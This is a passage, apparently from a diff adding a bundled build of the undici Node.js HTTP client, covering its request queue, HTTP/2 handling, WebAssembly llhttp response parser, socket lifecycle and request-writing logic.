2 resuming + this[kHostHeader] = `host: ${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}\r\n` + this[kBodyTimeout] = bodyTimeout != null ? bodyTimeout : 300e3 + this[kHeadersTimeout] = headersTimeout != null ? headersTimeout : 300e3 + this[kStrictContentLength] = strictContentLength == null ? true : strictContentLength + this[kMaxRedirections] = maxRedirections + this[kMaxRequests] = maxRequestsPerClient + this[kClosedResolve] = null + this[kMaxResponseSize] = maxResponseSize > -1 ? maxResponseSize : -1 + this[kHTTPConnVersion] = 'h1' + + // HTTP/2 + this[kHTTP2Session] = null + this[kHTTP2SessionState] = !allowH2 + ? null + : { + // streams: null, // Fixed queue of streams - For future support of `push` + openStreams: 0, // Keep track of them to decide wether or not unref the session + maxConcurrentStreams: maxConcurrentStreams != null ? maxConcurrentStreams : 100 // Max peerConcurrentStreams for a Node h2 server + } + this[kHost] = `${this[kUrl].hostname}${this[kUrl].port ? `:${this[kUrl].port}` : ''}` + + // kQueue is built up of 3 sections separated by + // the kRunningIdx and kPendingIdx indices. + // | complete | running | pending | + // ^ kRunningIdx ^ kPendingIdx ^ kQueue.length + // kRunningIdx points to the first running element. + // kPendingIdx points to the first pending element. + // This implements a fast queue with an amortized + // time of O(1). + + this[kQueue] = [] + this[kRunningIdx] = 0 + this[kPendingIdx] = 0 + } + + get pipelining () { + return this[kPipelining] + } + + set pipelining (value) { + this[kPipelining] = value + resume(this, true) + } + + get [kPending] () { + return this[kQueue].length - this[kPendingIdx] + } + + get [kRunning] () { + return this[kPendingIdx] - this[kRunningIdx] + } + + get [kSize] () { + return this[kQueue].length - this[kRunningIdx] + } + + get [kConnected] () { + return !!this[kSocket] && !this[kConnecting] && !this[kSocket].destroyed + } + + get [kBusy] () { + const socket = this[kSocket] + return ( + (socket && (socket[kReset] || socket[kWriting] || socket[kBlocking])) || + (this[kSize] >= (this[kPipelining] || 1)) || + this[kPending] > 0 + ) + } + + /* istanbul ignore: only used for test */ + [kConnect] (cb) { + connect(this) + this.once('connect', cb) + } + + [kDispatch] (opts, handler) { + const origin = opts.origin || this[kUrl].origin + + const request = this[kHTTPConnVersion] === 'h2' + ? Request[kHTTP2BuildRequest](origin, opts, handler) + : Request[kHTTP1BuildRequest](origin, opts, handler) + + this[kQueue].push(request) + if (this[kResuming]) { + // Do nothing. + } else if (util.bodyLength(request.body) == null && util.isIterable(request.body)) { + // Wait a tick in case stream/iterator is ended in the same tick. + this[kResuming] = 1 + process.nextTick(resume, this) + } else { + resume(this, true) + } + + if (this[kResuming] && this[kNeedDrain] !== 2 && this[kBusy]) { + this[kNeedDrain] = 2 + } + + return this[kNeedDrain] < 2 + } + + async [kClose] () { + // TODO: for H2 we need to gracefully flush the remaining enqueued + // request and close each stream. + return new Promise((resolve) => { + if (!this[kSize]) { + resolve(null) + } else { + this[kClosedResolve] = resolve + } + }) + } + + async [kDestroy] (err) { + return new Promise((resolve) => { + const requests = this[kQueue].splice(this[kPendingIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(this, request, err) + } + + const callback = () => { + if (this[kClosedResolve]) { + // TODO (fix): Should we error here with ClientDestroyedError? + this[kClosedResolve]() + this[kClosedResolve] = null + } + resolve() + } + + if (this[kHTTP2Session] != null) { + util.destroy(this[kHTTP2Session], err) + this[kHTTP2Session] = null + this[kHTTP2SessionState] = null + } + + if (!this[kSocket]) { + queueMicrotask(callback) + } else { + util.destroy(this[kSocket].on('close', callback), err) + } + + resume(this) + }) + } +} + +function onHttp2SessionError (err) { + assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') + + this[kSocket][kError] = err + + onError(this[kClient], err) +} + +function onHttp2FrameError (type, code, id) { + const err = new InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) + + if (id === 0) { + this[kSocket][kError] = err + onError(this[kClient], err) + } +} + +function onHttp2SessionEnd () { + util.destroy(this, new SocketError('other side closed')) + util.destroy(this[kSocket], new SocketError('other side closed')) +} + +function onHTTP2GoAway (code) { + const client = this[kClient] + const err = new InformationalError(`HTTP/2: "GOAWAY" frame received with code ${code}`) + client[kSocket] = null + client[kHTTP2Session] = null + + if (client.destroyed) { + assert(this[kPending] === 0) + + // Fail entire queue. + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(this, request, err) + } + } else if (client[kRunning] > 0) { + // Fail head of pipeline. + const request = client[kQueue][client[kRunningIdx]] + client[kQueue][client[kRunningIdx]++] = null + + errorRequest(client, request, err) + } + + client[kPendingIdx] = client[kRunningIdx] + + assert(client[kRunning] === 0) + + client.emit('disconnect', + client[kUrl], + [client], + err + ) + + resume(client) +} + +const constants = __nccwpck_require__(953) +const createRedirectInterceptor = __nccwpck_require__(8861) +const EMPTY_BUF = Buffer.alloc(0) + +async function lazyllhttp () { + const llhttpWasmData = process.env.JEST_WORKER_ID ? __nccwpck_require__(1145) : undefined + + let mod + try { + mod = await WebAssembly.compile(Buffer.from(__nccwpck_require__(5627), 'base64')) + } catch (e) { + /* istanbul ignore next */ + + // We could check if the error was caused by the simd option not + // being enabled, but the occurring of this other error + // * https://github.com/emscripten-core/emscripten/issues/11495 + // got me to remove that check to avoid breaking Node 12. + mod = await WebAssembly.compile(Buffer.from(llhttpWasmData || __nccwpck_require__(1145), 'base64')) + } + + return await WebAssembly.instantiate(mod, { + env: { + /* eslint-disable camelcase */ + + wasm_on_url: (p, at, len) => { + /* istanbul ignore next */ + return 0 + }, + wasm_on_status: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onStatus(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_message_begin: (p) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onMessageBegin() || 0 + }, + wasm_on_header_field: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onHeaderField(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_header_value: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onHeaderValue(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_headers_complete: (p, statusCode, upgrade, shouldKeepAlive) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onHeadersComplete(statusCode, Boolean(upgrade), Boolean(shouldKeepAlive)) || 0 + }, + wasm_on_body: (p, at, len) => { + assert.strictEqual(currentParser.ptr, p) + const start = at - currentBufferPtr + currentBufferRef.byteOffset + return currentParser.onBody(new FastBuffer(currentBufferRef.buffer, start, len)) || 0 + }, + wasm_on_message_complete: (p) => { + assert.strictEqual(currentParser.ptr, p) + return currentParser.onMessageComplete() || 0 + } + + /* eslint-enable camelcase */ + } + }) +} + +let llhttpInstance = null +let llhttpPromise = lazyllhttp() +llhttpPromise.catch() + +let currentParser = null +let currentBufferRef = null +let currentBufferSize = 0 +let currentBufferPtr = null + +const TIMEOUT_HEADERS = 1 +const TIMEOUT_BODY = 2 +const TIMEOUT_IDLE = 3 + +class Parser { + constructor (client, socket, { exports }) { + assert(Number.isFinite(client[kMaxHeadersSize]) && client[kMaxHeadersSize] > 0) + + this.llhttp = exports + this.ptr = this.llhttp.llhttp_alloc(constants.TYPE.RESPONSE) + this.client = client + this.socket = socket + this.timeout = null + this.timeoutValue = null + this.timeoutType = null + this.statusCode = null + this.statusText = '' + this.upgrade = false + this.headers = [] + this.headersSize = 0 + this.headersMaxSize = client[kMaxHeadersSize] + this.shouldKeepAlive = false + this.paused = false + this.resume = this.resume.bind(this) + + this.bytesRead = 0 + + this.keepAlive = '' + this.contentLength = '' + this.connection = '' + this.maxResponseSize = client[kMaxResponseSize] + } + + setTimeout (value, type) { + this.timeoutType = type + if (value !== this.timeoutValue) { + timers.clearTimeout(this.timeout) + if (value) { + this.timeout = timers.setTimeout(onParserTimeout, value, this) + // istanbul ignore else: only for jest + if (this.timeout.unref) { + this.timeout.unref() + } + } else { + this.timeout = null + } + this.timeoutValue = value + } else if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + } + + resume () { + if (this.socket.destroyed || !this.paused) { + return + } + + assert(this.ptr != null) + assert(currentParser == null) + + this.llhttp.llhttp_resume(this.ptr) + + assert(this.timeoutType === TIMEOUT_BODY) + if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + this.paused = false + this.execute(this.socket.read() || EMPTY_BUF) // Flush parser. + this.readMore() + } + + readMore () { + while (!this.paused && this.ptr) { + const chunk = this.socket.read() + if (chunk === null) { + break + } + this.execute(chunk) + } + } + + execute (data) { + assert(this.ptr != null) + assert(currentParser == null) + assert(!this.paused) + + const { socket, llhttp } = this + + if (data.length > currentBufferSize) { + if (currentBufferPtr) { + llhttp.free(currentBufferPtr) + } + currentBufferSize = Math.ceil(data.length / 4096) * 4096 + currentBufferPtr = llhttp.malloc(currentBufferSize) + } + + new Uint8Array(llhttp.memory.buffer, currentBufferPtr, currentBufferSize).set(data) + + // Call `execute` on the wasm parser. + // We pass the `llhttp_parser` pointer address, the pointer address of buffer view data, + // and finally the length of bytes to parse. + // The return value is an error code or `constants.ERROR.OK`. + try { + let ret + + try { + currentBufferRef = data + currentParser = this + ret = llhttp.llhttp_execute(this.ptr, currentBufferPtr, data.length) + /* eslint-disable-next-line no-useless-catch */ + } catch (err) { + /* istanbul ignore next: difficult to make a test case for */ + throw err + } finally { + currentParser = null + currentBufferRef = null + } + + const offset = llhttp.llhttp_get_error_pos(this.ptr) - currentBufferPtr + + if (ret === constants.ERROR.PAUSED_UPGRADE) { + this.onUpgrade(data.slice(offset)) + } else if (ret === constants.ERROR.PAUSED) { + this.paused = true + socket.unshift(data.slice(offset)) + } else if (ret !== constants.ERROR.OK) { + const ptr = llhttp.llhttp_get_error_reason(this.ptr) + let message = '' + /* istanbul ignore else: difficult to make a test case for */ + if (ptr) { + const len = new Uint8Array(llhttp.memory.buffer, ptr).indexOf(0) + message = + 'Response does not match the HTTP/1.1 protocol (' + + Buffer.from(llhttp.memory.buffer, ptr, len).toString() + + ')' + } + throw new HTTPParserError(message, constants.ERROR[ret], data.slice(offset)) + } + } catch (err) { + util.destroy(socket, err) + } + } + + destroy () { + assert(this.ptr != null) + assert(currentParser == null) + + this.llhttp.llhttp_free(this.ptr) + this.ptr = null + + timers.clearTimeout(this.timeout) + this.timeout = null + this.timeoutValue = null + this.timeoutType = null + + this.paused = false + } + + onStatus (buf) { + this.statusText = buf.toString() + } + + onMessageBegin () { + const { socket, client } = this + + /* istanbul ignore next: difficult to make a test case for */ + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + if (!request) { + return -1 + } + } + + onHeaderField (buf) { + const len = this.headers.length + + if ((len & 1) === 0) { + this.headers.push(buf) + } else { + this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) + } + + this.trackHeader(buf.length) + } + + onHeaderValue (buf) { + let len = this.headers.length + + if ((len & 1) === 1) { + this.headers.push(buf) + len += 1 + } else { + this.headers[len - 1] = Buffer.concat([this.headers[len - 1], buf]) + } + + const key = this.headers[len - 2] + if (key.length === 10 && key.toString().toLowerCase() === 'keep-alive') { + this.keepAlive += buf.toString() + } else if (key.length === 10 && key.toString().toLowerCase() === 'connection') { + this.connection += buf.toString() + } else if (key.length === 14 && key.toString().toLowerCase() === 'content-length') { + this.contentLength += buf.toString() + } + + this.trackHeader(buf.length) + } + + trackHeader (len) { + this.headersSize += len + if (this.headersSize >= this.headersMaxSize) { + util.destroy(this.socket, new HeadersOverflowError()) + } + } + + onUpgrade (head) { + const { upgrade, client, socket, headers, statusCode } = this + + assert(upgrade) + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert(!socket.destroyed) + assert(socket === client[kSocket]) + assert(!this.paused) + assert(request.upgrade || request.method === 'CONNECT') + + this.statusCode = null + this.statusText = '' + this.shouldKeepAlive = null + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + socket.unshift(head) + + socket[kParser].destroy() + socket[kParser] = null + + socket[kClient] = null + socket[kError] = null + socket + .removeListener('error', onSocketError) + .removeListener('readable', onSocketReadable) + .removeListener('end', onSocketEnd) + .removeListener('close', onSocketClose) + + client[kSocket] = null + client[kQueue][client[kRunningIdx]++] = null + client.emit('disconnect', client[kUrl], [client], new InformationalError('upgrade')) + + try { + request.onUpgrade(statusCode, headers, socket) + } catch (err) { + util.destroy(socket, err) + } + + resume(client) + } + + onHeadersComplete (statusCode, upgrade, shouldKeepAlive) { + const { client, socket, headers, statusText } = this + + /* istanbul ignore next: difficult to make a test case for */ + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + + /* istanbul ignore next: difficult to make a test case for */ + if (!request) { + return -1 + } + + assert(!this.upgrade) + assert(this.statusCode < 200) + + if (statusCode === 100) { + util.destroy(socket, new SocketError('bad response', util.getSocketInfo(socket))) + return -1 + } + + /* this can only happen if server is misbehaving */ + if (upgrade && !request.upgrade) { + util.destroy(socket, new SocketError('bad upgrade', util.getSocketInfo(socket))) + return -1 + } + + assert.strictEqual(this.timeoutType, TIMEOUT_HEADERS) + + this.statusCode = statusCode + this.shouldKeepAlive = ( + shouldKeepAlive || + // Override llhttp value which does not allow keepAlive for HEAD. + (request.method === 'HEAD' && !socket[kReset] && this.connection.toLowerCase() === 'keep-alive') + ) + + if (this.statusCode >= 200) { + const bodyTimeout = request.bodyTimeout != null + ? request.bodyTimeout + : client[kBodyTimeout] + this.setTimeout(bodyTimeout, TIMEOUT_BODY) + } else if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + if (request.method === 'CONNECT') { + assert(client[kRunning] === 1) + this.upgrade = true + return 2 + } + + if (upgrade) { + assert(client[kRunning] === 1) + this.upgrade = true + return 2 + } + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + if (this.shouldKeepAlive && client[kPipelining]) { + const keepAliveTimeout = this.keepAlive ? util.parseKeepAliveTimeout(this.keepAlive) : null + + if (keepAliveTimeout != null) { + const timeout = Math.min( + keepAliveTimeout - client[kKeepAliveTimeoutThreshold], + client[kKeepAliveMaxTimeout] + ) + if (timeout <= 0) { + socket[kReset] = true + } else { + client[kKeepAliveTimeoutValue] = timeout + } + } else { + client[kKeepAliveTimeoutValue] = client[kKeepAliveDefaultTimeout] + } + } else { + // Stop more requests from being dispatched. + socket[kReset] = true + } + + const pause = request.onHeaders(statusCode, headers, this.resume, statusText) === false + + if (request.aborted) { + return -1 + } + + if (request.method === 'HEAD') { + return 1 + } + + if (statusCode < 200) { + return 1 + } + + if (socket[kBlocking]) { + socket[kBlocking] = false + resume(client) + } + + return pause ? constants.ERROR.PAUSED : 0 + } + + onBody (buf) { + const { client, socket, statusCode, maxResponseSize } = this + + if (socket.destroyed) { + return -1 + } + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert.strictEqual(this.timeoutType, TIMEOUT_BODY) + if (this.timeout) { + // istanbul ignore else: only for jest + if (this.timeout.refresh) { + this.timeout.refresh() + } + } + + assert(statusCode >= 200) + + if (maxResponseSize > -1 && this.bytesRead + buf.length > maxResponseSize) { + util.destroy(socket, new ResponseExceededMaxSizeError()) + return -1 + } + + this.bytesRead += buf.length + + if (request.onData(buf) === false) { + return constants.ERROR.PAUSED + } + } + + onMessageComplete () { + const { client, socket, statusCode, upgrade, headers, contentLength, bytesRead, shouldKeepAlive } = this + + if (socket.destroyed && (!statusCode || shouldKeepAlive)) { + return -1 + } + + if (upgrade) { + return + } + + const request = client[kQueue][client[kRunningIdx]] + assert(request) + + assert(statusCode >= 100) + + this.statusCode = null + this.statusText = '' + this.bytesRead = 0 + this.contentLength = '' + this.keepAlive = '' + this.connection = '' + + assert(this.headers.length % 2 === 0) + this.headers = [] + this.headersSize = 0 + + if (statusCode < 200) { + return + } + + /* istanbul ignore next: should be handled by llhttp? */ + if (request.method !== 'HEAD' && contentLength && bytesRead !== parseInt(contentLength, 10)) { + util.destroy(socket, new ResponseContentLengthMismatchError()) + return -1 + } + + request.onComplete(headers) + + client[kQueue][client[kRunningIdx]++] = null + + if (socket[kWriting]) { + assert.strictEqual(client[kRunning], 0) + // Response completed before request. + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (!shouldKeepAlive) { + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (socket[kReset] && client[kRunning] === 0) { + // Destroy socket once all requests have completed. + // The request at the tail of the pipeline is the one + // that requested reset and no further requests should + // have been queued since then. + util.destroy(socket, new InformationalError('reset')) + return constants.ERROR.PAUSED + } else if (client[kPipelining] === 1) { + // We must wait a full event loop cycle to reuse this socket to make sure + // that non-spec compliant servers are not closing the connection even if they + // said they won't. + setImmediate(resume, client) + } else { + resume(client) + } + } +} + +function onParserTimeout (parser) { + const { socket, timeoutType, client } = parser + + /* istanbul ignore else */ + if (timeoutType === TIMEOUT_HEADERS) { + if (!socket[kWriting] || socket.writableNeedDrain || client[kRunning] > 1) { + assert(!parser.paused, 'cannot be paused while waiting for headers') + util.destroy(socket, new HeadersTimeoutError()) + } + } else if (timeoutType === TIMEOUT_BODY) { + if (!parser.paused) { + util.destroy(socket, new BodyTimeoutError()) + } + } else if (timeoutType === TIMEOUT_IDLE) { + assert(client[kRunning] === 0 && client[kKeepAliveTimeoutValue]) + util.destroy(socket, new InformationalError('socket idle timeout')) + } +} + +function onSocketReadable () { + const { [kParser]: parser } = this + if (parser) { + parser.readMore() + } +} + +function onSocketError (err) { + const { [kClient]: client, [kParser]: parser } = this + + assert(err.code !== 'ERR_TLS_CERT_ALTNAME_INVALID') + + if (client[kHTTPConnVersion] !== 'h2') { + // On Mac OS, we get an ECONNRESET even if there is a full body to be forwarded + // to the user. + if (err.code === 'ECONNRESET' && parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so for as a valid response. + parser.onMessageComplete() + return + } + } + + this[kError] = err + + onError(this[kClient], err) +} + +function onError (client, err) { + if ( + client[kRunning] === 0 && + err.code !== 'UND_ERR_INFO' && + err.code !== 'UND_ERR_SOCKET' + ) { + // Error is not caused by running request and not a recoverable + // socket error. + + assert(client[kPendingIdx] === client[kRunningIdx]) + + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(client, request, err) + } + assert(client[kSize] === 0) + } +} + +function onSocketEnd () { + const { [kParser]: parser, [kClient]: client } = this + + if (client[kHTTPConnVersion] !== 'h2') { + if (parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so far as a valid response. + parser.onMessageComplete() + return + } + } + + util.destroy(this, new SocketError('other side closed', util.getSocketInfo(this))) +} + +function onSocketClose () { + const { [kClient]: client, [kParser]: parser } = this + + if (client[kHTTPConnVersion] === 'h1' && parser) { + if (!this[kError] && parser.statusCode && !parser.shouldKeepAlive) { + // We treat all incoming data so far as a valid response. + parser.onMessageComplete() + } + + this[kParser].destroy() + this[kParser] = null + } + + const err = this[kError] || new SocketError('closed', util.getSocketInfo(this)) + + client[kSocket] = null + + if (client.destroyed) { + assert(client[kPending] === 0) + + // Fail entire queue. + const requests = client[kQueue].splice(client[kRunningIdx]) + for (let i = 0; i < requests.length; i++) { + const request = requests[i] + errorRequest(client, request, err) + } + } else if (client[kRunning] > 0 && err.code !== 'UND_ERR_INFO') { + // Fail head of pipeline. + const request = client[kQueue][client[kRunningIdx]] + client[kQueue][client[kRunningIdx]++] = null + + errorRequest(client, request, err) + } + + client[kPendingIdx] = client[kRunningIdx] + + assert(client[kRunning] === 0) + + client.emit('disconnect', client[kUrl], [client], err) + + resume(client) +} + +async function connect (client) { + assert(!client[kConnecting]) + assert(!client[kSocket]) + + let { host, hostname, protocol, port } = client[kUrl] + + // Resolve ipv6 + if (hostname[0] === '[') { + const idx = hostname.indexOf(']') + + assert(idx !== -1) + const ip = hostname.substring(1, idx) + + assert(net.isIP(ip)) + hostname = ip + } + + client[kConnecting] = true + + if (channels.beforeConnect.hasSubscribers) { + channels.beforeConnect.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector] + }) + } + + try { + const socket = await new Promise((resolve, reject) => { + client[kConnector]({ + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, (err, socket) => { + if (err) { + reject(err) + } else { + resolve(socket) + } + }) + }) + + if (client.destroyed) { + util.destroy(socket.on('error', () => {}), new ClientDestroyedError()) + return + } + + client[kConnecting] = false + + assert(socket) + + const isH2 = socket.alpnProtocol === 'h2' + if (isH2) { + if (!h2ExperimentalWarned) { + h2ExperimentalWarned = true + process.emitWarning('H2 support is experimental, expect them to change at any time.', { + code: 'UNDICI-H2' + }) + } + + const session = http2.connect(client[kUrl], { + createConnection: () => socket, + peerMaxConcurrentStreams: client[kHTTP2SessionState].maxConcurrentStreams + }) + + client[kHTTPConnVersion] = 'h2' + session[kClient] = client + session[kSocket] = socket + session.on('error', onHttp2SessionError) + session.on('frameError', onHttp2FrameError) + session.on('end', onHttp2SessionEnd) + session.on('goaway', onHTTP2GoAway) + session.on('close', onSocketClose) + session.unref() + + client[kHTTP2Session] = session + socket[kHTTP2Session] = session + } else { + if (!llhttpInstance) { + llhttpInstance = await llhttpPromise + llhttpPromise = null + } + + socket[kNoRef] = false + socket[kWriting] = false + socket[kReset] = false + socket[kBlocking] = false + socket[kParser] = new Parser(client, socket, llhttpInstance) + } + + socket[kCounter] = 0 + socket[kMaxRequests] = client[kMaxRequests] + socket[kClient] = client + socket[kError] = null + + socket + .on('error', onSocketError) + .on('readable', onSocketReadable) + .on('end', onSocketEnd) + .on('close', onSocketClose) + + client[kSocket] = socket + + if (channels.connected.hasSubscribers) { + channels.connected.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector], + socket + }) + } + client.emit('connect', client[kUrl], [client]) + } catch (err) { + if (client.destroyed) { + return + } + + client[kConnecting] = false + + if (channels.connectError.hasSubscribers) { + channels.connectError.publish({ + connectParams: { + host, + hostname, + protocol, + port, + servername: client[kServerName], + localAddress: client[kLocalAddress] + }, + connector: client[kConnector], + error: err + }) + } + + if (err.code === 'ERR_TLS_CERT_ALTNAME_INVALID') { + assert(client[kRunning] === 0) + while (client[kPending] > 0 && client[kQueue][client[kPendingIdx]].servername === client[kServerName]) { + const request = client[kQueue][client[kPendingIdx]++] + errorRequest(client, request, err) + } + } else { + onError(client, err) + } + + client.emit('connectionError', client[kUrl], [client], err) + } + + resume(client) +} + +function emitDrain (client) { + client[kNeedDrain] = 0 + client.emit('drain', client[kUrl], [client]) +} + +function resume (client, sync) { + if (client[kResuming] === 2) { + return + } + + client[kResuming] = 2 + + _resume(client, sync) + client[kResuming] = 0 + + if (client[kRunningIdx] > 256) { + client[kQueue].splice(0, client[kRunningIdx]) + client[kPendingIdx] -= client[kRunningIdx] + client[kRunningIdx] = 0 + } +} + +function _resume (client, sync) { + while (true) { + if (client.destroyed) { + assert(client[kPending] === 0) + return + } + + if (client[kClosedResolve] && !client[kSize]) { + client[kClosedResolve]() + client[kClosedResolve] = null + return + } + + const socket = client[kSocket] + + if (socket && !socket.destroyed && socket.alpnProtocol !== 'h2') { + if (client[kSize] === 0) { + if (!socket[kNoRef] && socket.unref) { + socket.unref() + socket[kNoRef] = true + } + } else if (socket[kNoRef] && socket.ref) { + socket.ref() + socket[kNoRef] = false + } + + if (client[kSize] === 0) { + if (socket[kParser].timeoutType !== TIMEOUT_IDLE) { + socket[kParser].setTimeout(client[kKeepAliveTimeoutValue], TIMEOUT_IDLE) + } + } else if (client[kRunning] > 0 && socket[kParser].statusCode < 200) { + if (socket[kParser].timeoutType !== TIMEOUT_HEADERS) { + const request = client[kQueue][client[kRunningIdx]] + const headersTimeout = request.headersTimeout != null + ? request.headersTimeout + : client[kHeadersTimeout] + socket[kParser].setTimeout(headersTimeout, TIMEOUT_HEADERS) + } + } + } + + if (client[kBusy]) { + client[kNeedDrain] = 2 + } else if (client[kNeedDrain] === 2) { + if (sync) { + client[kNeedDrain] = 1 + process.nextTick(emitDrain, client) + } else { + emitDrain(client) + } + continue + } + + if (client[kPending] === 0) { + return + } + + if (client[kRunning] >= (client[kPipelining] || 1)) { + return + } + + const request = client[kQueue][client[kPendingIdx]] + + if (client[kUrl].protocol === 'https:' && client[kServerName] !== request.servername) { + if (client[kRunning] > 0) { + return + } + + client[kServerName] = request.servername + + if (socket && socket.servername !== request.servername) { + util.destroy(socket, new InformationalError('servername changed')) + return + } + } + + if (client[kConnecting]) { + return + } + + if (!socket && !client[kHTTP2Session]) { + connect(client) + return + } + + if (socket.destroyed || socket[kWriting] || socket[kReset] || socket[kBlocking]) { + return + } + + if (client[kRunning] > 0 && !request.idempotent) { + // Non-idempotent request cannot be retried. + // Ensure that no other requests are inflight and + // could cause failure. + return + } + + if (client[kRunning] > 0 && (request.upgrade || request.method === 'CONNECT')) { + // Don't dispatch an upgrade until all preceding requests have completed. + // A misbehaving server might upgrade the connection before all pipelined + // request has completed. + return + } + + if (client[kRunning] > 0 && util.bodyLength(request.body) !== 0 && + (util.isStream(request.body) || util.isAsyncIterable(request.body))) { + // Request with stream or iterator body can error while other requests + // are inflight and indirectly error those as well. + // Ensure this doesn't happen by waiting for inflight + // to complete before dispatching. + + // Request with stream or iterator body cannot be retried. + // Ensure that no other requests are inflight and + // could cause failure. + return + } + + if (!request.aborted && write(client, request)) { + client[kPendingIdx]++ + } else { + client[kQueue].splice(client[kPendingIdx], 1) + } + } +} + +// https://www.rfc-editor.org/rfc/rfc7230#section-3.3.2 +function shouldSendContentLength (method) { + return method !== 'GET' && method !== 'HEAD' && method !== 'OPTIONS' && method !== 'TRACE' && method !== 'CONNECT' +} + +function write (client, request) { + if (client[kHTTPConnVersion] === 'h2') { + writeH2(client, client[kHTTP2Session], request) + return + } + + const { body, method, path, host, upgrade, headers, blocking, reset } = request + + // https://tools.ietf.org/html/rfc7231#section-4.3.1 + // https://tools.ietf.org/html/rfc7231#section-4.3.2 + // https://tools.ietf.org/html/rfc7231#section-4.3.5 + + // Sending a payload body on a request that does not + // expect it can cause undefined behavior on some + // servers and corrupt connection state. Do not + // re-use the connection for further requests. + + const expectsPayload = ( + method === 'PUT' || + method === 'POST' || + method === 'PATCH' + ) + + if (body && typeof body.read === 'function') { + // Try to read EOF in order to get length. + body.read(0) + } + + const bodyLength = util.bodyLength(body) + + let contentLength = bodyLength + + if (contentLength === null) { + contentLength = request.contentLength + } + + if (contentLength === 0 && !expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD NOT send a Content-Length header field when + // the request message does not contain a payload body and the method + // semantics do not anticipate such a body. + + contentLength = null + } + + // https://github.com/nodejs/undici/issues/2046 + // A user agent may send a Content-Length header with 0 value, this should be allowed. + if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength !== null && request.contentLength !== contentLength) { + if (client[kStrictContentLength]) { + errorRequest(client, request, new RequestContentLengthMismatchError()) + return false + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + const socket = client[kSocket] + + try { + request.onConnect((err) => { + if (request.aborted || request.completed) { + return + } + + errorRequest(client, request, err || new RequestAbortedError()) + + util.destroy(socket, new InformationalError('aborted')) + }) + } catch (err) { + errorRequest(client, request, err) + } + + if (request.aborted) { + return false + } + + if (method === 'HEAD') { + // https://github.com/mcollina/undici/issues/258 + // Close after a HEAD request to interop with misbehaving servers + // that may send a body in the response. + + socket[kReset] = true + } + + if (upgrade || method === 'CONNECT') { + // On CONNECT or upgrade, block pipeline from dispatching further + // requests on this connection. + + socket[kReset] = true + } + + if (reset != null) { + socket[kReset] = reset + } + + if (client[kMaxRequests] && socket[kCounter]++ >= client[kMaxRequests]) { + socket[kReset] = true + } + + if (blocking) { + socket[kBlocking] = true + } + + let header = `${method} ${path} HTTP/1.1\r\n` + + if (typeof host === 'string') { + header += `host: ${host}\r\n` + } else { + header += client[kHostHeader] + } + + if (upgrade) { + header += `connection: upgrade\r\nupgrade: ${upgrade}\r\n` + } else if (client[kPipelining] && !socket[kReset]) { + header += 'connection: keep-alive\r\n' + } else { + header += 'connection: close\r\n' + } + + if (headers) { + header += headers + } + + if (channels.sendHeaders.hasSubscribers) { + channels.sendHeaders.publish({ request, headers: header, socket }) + } + + /* istanbul ignore else: assertion */ + if (!body || bodyLength === 0) { + if (contentLength === 0) { + socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') + } else { + assert(contentLength === null, 'no body must not have content length') + socket.write(`${header}\r\n`, 'latin1') + } + request.onRequestSent() + } else if (util.isBuffer(body)) { + assert(contentLength === body.byteLength, 'buffer body must have content length') + + socket.cork() + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + socket.write(body) + socket.uncork() + request.onBodySent(body) + request.onRequestSent() + if (!expectsPayload) { + socket[kReset] = true + } + } else if (util.isBlobLike(body)) { + if (typeof body.stream === 'function') { + writeIterable({ body: body.stream(), client, request, socket, contentLength, header, expectsPayload }) + } else { + writeBlob({ body, client, request, socket, contentLength, header, expectsPayload }) + } + } else if (util.isStream(body)) { + writeStream({ body, client, request, socket, contentLength, header, expectsPayload }) + } else if (util.isIterable(body)) { + writeIterable({ body, client, request, socket, contentLength, header, expectsPayload }) + } else { + assert(false) + } + + return true +} + +function writeH2 